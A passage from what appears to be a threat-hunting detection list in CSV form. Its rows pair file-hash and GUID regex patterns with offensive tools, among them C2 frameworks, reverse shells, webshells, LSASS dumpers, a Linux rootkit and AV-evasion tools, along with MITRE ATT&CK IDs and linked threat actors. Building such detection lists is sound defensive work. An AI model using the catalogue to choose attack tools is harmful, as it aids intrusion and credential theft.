TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","34929" "*b7651de4fa3eef93541b646ccef946ab0ea464ea937ab32e5c660cff82a808d9*",".{0,1000}b7651de4fa3eef93541b646ccef946ab0ea464ea937ab32e5c660cff82a808d9.{0,1000}","offensive_tool_keyword","PrivFu","ArtsOfGetSystem privesc tools","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","#filehash","ArtsOfGetSystem","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","34930" "*b765a6553f1916e7ccaf5ad4ea8cdb5cbb8539069c98538e4e163dabd6d998f0*",".{0,1000}b765a6553f1916e7ccaf5ad4ea8cdb5cbb8539069c98538e4e163dabd6d998f0.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","34931" "*b7671f125bb2ed21d0476a00cfaa9ed6*",".{0,1000}b7671f125bb2ed21d0476a00cfaa9ed6.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. 
By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","N/A","10","10","1561","196","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z","34932" "*b77770a81d59239b2ada0f633c563cca30e3bf3e112a8545aee13185265c6324*",".{0,1000}b77770a81d59239b2ada0f633c563cca30e3bf3e112a8545aee13185265c6324.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","34936" "*b777f5e0912b17dc92eb667dc845f2af041a98d6ff189c00e806f6acff5fa231*",".{0,1000}b777f5e0912b17dc92eb667dc845f2af041a98d6ff189c00e806f6acff5fa231.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","34938" "*b78010d1d8ea2064764c4cb4973ead007f7655e745d3856ab750537bc78b6e4d*",".{0,1000}b78010d1d8ea2064764c4cb4973ead007f7655e745d3856ab750537bc78b6e4d.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","34939" 
"*b782285888ed48a94f495d3eaa46fe9f29f7bf087197c719792b6e730afb937b*",".{0,1000}b782285888ed48a94f495d3eaa46fe9f29f7bf087197c719792b6e730afb937b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","34940" "*b7890a15dadef8cdedd6580aed94ca26df6ec0eddb009176dba1eef8941ff6e6*",".{0,1000}b7890a15dadef8cdedd6580aed94ca26df6ec0eddb009176dba1eef8941ff6e6.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","34941" "*b79c2861d85b3c973152d22a7e43244c0fcb66394ceb91ab11606adbdff69e2b*",".{0,1000}b79c2861d85b3c973152d22a7e43244c0fcb66394ceb91ab11606adbdff69e2b.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","34942" "*b7a5527f8a5f361fc787facc955937ea2294a883a63e5ad4abf1c9ed26b49ccd*",".{0,1000}b7a5527f8a5f361fc787facc955937ea2294a883a63e5ad4abf1c9ed26b49ccd.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - 
TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","0","#filehash","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","34943" "*b7a9d9eff63ab4a330888d498d954e78cdc19b44435f26f6914aa4b2bbe86bbc*",".{0,1000}b7a9d9eff63ab4a330888d498d954e78cdc19b44435f26f6914aa4b2bbe86bbc.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","34946" "*b7aac417714cff0bd0a03475b7ff00ccdf5480bc463c14d407b9ed8bc8ffcc02*",".{0,1000}b7aac417714cff0bd0a03475b7ff00ccdf5480bc463c14d407b9ed8bc8ffcc02.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#filehash","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","34947" "*b7ac3213e10a169498f8e34b434aced491debb07d2e82c59c86f8c0c6581cf51*",".{0,1000}b7ac3213e10a169498f8e34b434aced491debb07d2e82c59c86f8c0c6581cf51.{0,1000}","offensive_tool_keyword","LsassReflectDumping","leverages the Process Forking technique using the RtlCreateProcessReflection API to clone the lsass.exe process. 
Once the clone is created - it utilizes MINIDUMP_CALLBACK_INFORMATION callbacks to generate a memory dump of the cloned process","T1003.001 - T1555.003 - T1077","TA0006","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/LsassReflectDumping","1","0","#filehash","N/A","10","2","198","27","2024-10-19T08:16:13Z","2024-10-17T14:57:30Z","34948" "*b7ae4b58d31453da02817000dd7465ab68434f43e22d2b7a5ffc73f3fa65f6cd*",".{0,1000}b7ae4b58d31453da02817000dd7465ab68434f43e22d2b7a5ffc73f3fa65f6cd.{0,1000}","offensive_tool_keyword","ShadowHound","set of PowerShell scripts for Active Directory enumeration","T1087 - T1018 - T1482 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/Friends-Security/ShadowHound","1","0","#filehash","N/A","8","4","345","36","2024-12-01T08:06:02Z","2024-11-21T15:01:14Z","34949" "*b7b10a29015b41041519488dc632cd5b0b39358f56d388277d99304917be4a9d*",".{0,1000}b7b10a29015b41041519488dc632cd5b0b39358f56d388277d99304917be4a9d.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","#filehash","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","34950" "*b7b5637287f143fe5e54c022e6c7b785141cfdeec2aceac263ee38e5ac17d3d7*",".{0,1000}b7b5637287f143fe5e54c022e6c7b785141cfdeec2aceac263ee38e5ac17d3d7.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#filehash #linux","N/A","10","10","1986","451","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z","34951" 
"*b7b67e33ca53799aa1be6a7aa7677363b8a0e711091bccd2e49f501d5dc22de7*",".{0,1000}b7b67e33ca53799aa1be6a7aa7677363b8a0e711091bccd2e49f501d5dc22de7.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","#filehash","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","34952" "*b7bb45d67e4db4c923cf5e62d0fc8c9ae23abfe214c8daa730d343b0d9205837*",".{0,1000}b7bb45d67e4db4c923cf5e62d0fc8c9ae23abfe214c8daa730d343b0d9205837.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","34954" "*b7c4eb1c120f959166ad5477119adb92db8081c61193847287a13fec1e780b24*",".{0,1000}b7c4eb1c120f959166ad5477119adb92db8081c61193847287a13fec1e780b24.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","34956" "*B7C64002-5002-410F-868C-826073AFA924*",".{0,1000}B7C64002\-5002\-410F\-868C\-826073AFA924.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP - C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#GUIDproject","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","34958" "*b7c6bdd822f8710858ed799df49b711001e35901e24ba1726b71987d83cf3e76*",".{0,1000}b7c6bdd822f8710858ed799df49b711001e35901e24ba1726b71987d83cf3e76.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black 
Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","34959" "*b7c6d0220856790482d617170609b3fb76dfbcf7aaa97dac70767e7896151d86*",".{0,1000}b7c6d0220856790482d617170609b3fb76dfbcf7aaa97dac70767e7896151d86.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","34960" "*b7c7c4caafe06600e68c48eed104ea895a933df2076198e27707af00996c336f*",".{0,1000}b7c7c4caafe06600e68c48eed104ea895a933df2076198e27707af00996c336f.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","34961" "*b7d464d0d52a2c35760aa7cf90a90e1ea3513a8827b175aba5099a90dee416f9*",".{0,1000}b7d464d0d52a2c35760aa7cf90a90e1ea3513a8827b175aba5099a90dee416f9.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","0","#filehash","N/A","7","1","13","5","2024-05-17T12:43:43Z","2024-02-17T15:39:25Z","34963" 
"*b7e50a98223c9a3008aed3617b5b9282a40b7ef60fc274734d3970c7f9add804*",".{0,1000}b7e50a98223c9a3008aed3617b5b9282a40b7ef60fc274734d3970c7f9add804.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","34966" "*b7eab05d2830689b6a72af875085366fc8116fec2c856c7dc5af728bd0b6b972*",".{0,1000}b7eab05d2830689b6a72af875085366fc8116fec2c856c7dc5af728bd0b6b972.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","34967" "*b7f00ce7576d810f2ccaa6d31767672e94e50e3ffec2eee2a2ff373aa651cf72*",".{0,1000}b7f00ce7576d810f2ccaa6d31767672e94e50e3ffec2eee2a2ff373aa651cf72.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","34969" "*b7f57aedc361258fea85dedd3713454983c561335cd9d2d8d9d072a0e7ac8c7d*",".{0,1000}b7f57aedc361258fea85dedd3713454983c561335cd9d2d8d9d072a0e7ac8c7d.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","34971" 
"*b7f9eb0a95f3523aee8363c59e26a88bcf30d2160db862d4d167945ad342d777*",".{0,1000}b7f9eb0a95f3523aee8363c59e26a88bcf30d2160db862d4d167945ad342d777.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","34972" "*b7fa937e1b42914b6dee7a038520775e09532babd8c296a8e86db0faab66236c*",".{0,1000}b7fa937e1b42914b6dee7a038520775e09532babd8c296a8e86db0faab66236c.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","#filehash","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","34973" "*b7fb827ab82836232bdf3a6be19a1ebd3d5194dbff0b922b0ae39f8562c9822f*",".{0,1000}b7fb827ab82836232bdf3a6be19a1ebd3d5194dbff0b922b0ae39f8562c9822f.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","34974" 
"*B7FF0EE8-6C68-46C6-AADB-58C0E3309FB2*",".{0,1000}B7FF0EE8\-6C68\-46C6\-AADB\-58C0E3309FB2.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","34975" "*b80125fae6f888a941e421e929bf6837142d0bf30f13fe01c266f7dd05e904b0*",".{0,1000}b80125fae6f888a941e421e929bf6837142d0bf30f13fe01c266f7dd05e904b0.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","34977" "*b809230b5259568f275760187a0eb5c2cd00a6ac859d92e685036c1dfb797f0d*",".{0,1000}b809230b5259568f275760187a0eb5c2cd00a6ac859d92e685036c1dfb797f0d.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","34978" "*b80bb505227429df0b61a07d2ab57c02a48043fbd90d4680192b1698e9a2f37a*",".{0,1000}b80bb505227429df0b61a07d2ab57c02a48043fbd90d4680192b1698e9a2f37a.{0,1000}","offensive_tool_keyword","var0xshell","var0xshell - shell with xor encryption","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/var0xshell/tree/main","1","0","#filehash","N/A","8","10","4","1","2023-01-09T06:53:42Z","2023-01-08T21:34:26Z","34979" 
"*b80ee97a9c30291203d5a224dedc328b45a09ec4999ab562303ef93388e12c0a*",".{0,1000}b80ee97a9c30291203d5a224dedc328b45a09ec4999ab562303ef93388e12c0a.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","34980" "*b81fdf0e50bab32722ec97ff2193bbdbc086633104ea03cb00d3d32419f513ae*",".{0,1000}b81fdf0e50bab32722ec97ff2193bbdbc086633104ea03cb00d3d32419f513ae.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","34983" "*b8285e421d702738eab45670ecae439a7228994e7068b04cb51740e47efbfb41*",".{0,1000}b8285e421d702738eab45670ecae439a7228994e7068b04cb51740e47efbfb41.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1572","TA0002 - TA0011","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","#filehash","N/A","10","10","454","73","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z","34984" "*b83141462b74d6d62282551eb34d139eb5c3071516f670af42c1dcc30d6547b2*",".{0,1000}b83141462b74d6d62282551eb34d139eb5c3071516f670af42c1dcc30d6547b2.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD 
CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","34986" "*b8328fa4f70b5252b4d5850b540953a7766483b7c710f4fef68186662849f040*",".{0,1000}b8328fa4f70b5252b4d5850b540953a7766483b7c710f4fef68186662849f040.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","0","#filehash","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","34987" "*b834cbb559fcc9f0dcea0b9303b2006f14d239964b87e6f37d44d5520b93ca0d*",".{0,1000}b834cbb559fcc9f0dcea0b9303b2006f14d239964b87e6f37d44d5520b93ca0d.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","34988" "*b83bc4961b33aa3ec0399c801a97c2c47766462991ffa488a4cbaee1ab3e0bff*",".{0,1000}b83bc4961b33aa3ec0399c801a97c2c47766462991ffa488a4cbaee1ab3e0bff.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","34990" "*b83bd9409f469f3b094b81bdbf548e5449357ecd4c604d45f3ccd59c02e28a1e*",".{0,1000}b83bd9409f469f3b094b81bdbf548e5449357ecd4c604d45f3ccd59c02e28a1e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - 
TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","34991" "*b83dc319987bebf9dca8b6e85671f9bdced13236275598a29e8669842a225bbb*",".{0,1000}b83dc319987bebf9dca8b6e85671f9bdced13236275598a29e8669842a225bbb.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","34992" "*b83de77d08d842c68a940103588639cef6ab9f9fa12241311d9aed3690502af3*",".{0,1000}b83de77d08d842c68a940103588639cef6ab9f9fa12241311d9aed3690502af3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","34993" "*b83ee6d62e5e159fa0a16fcad953862a1d567abc5c60aa35dc02aac7efc87870*",".{0,1000}b83ee6d62e5e159fa0a16fcad953862a1d567abc5c60aa35dc02aac7efc87870.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: 
https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","#filehash","https://www.virustotal.com/gui/file/b83ee6d62e5e159fa0a16fcad953862a1d567abc5c60aa35dc02aac7efc87870","10","10","N/A","N/A","N/A","N/A","34994" "*b83ee6d62e5e159fa0a16fcad953862a1d567abc5c60aa35dc02aac7efc87870*",".{0,1000}b83ee6d62e5e159fa0a16fcad953862a1d567abc5c60aa35dc02aac7efc87870.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://x.com/cyb3rops/status/1776924344481984944","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","#filehash","rule author: @cyb3rops - link: https://x.com/cyb3rops/status/1776924344481984944","10","10","N/A","N/A","N/A","N/A","34995" "*b847015c30b9a6cda3b856cc82ae840b50ca407a71db9d5a9785ef8073ded517*",".{0,1000}b847015c30b9a6cda3b856cc82ae840b50ca407a71db9d5a9785ef8073ded517.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","34996" "*b84798b914f570f9b52bf3fe754c2559795aa6c3daa4c4344f4bce69f5f759d9*",".{0,1000}b84798b914f570f9b52bf3fe754c2559795aa6c3daa4c4344f4bce69f5f759d9.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense 
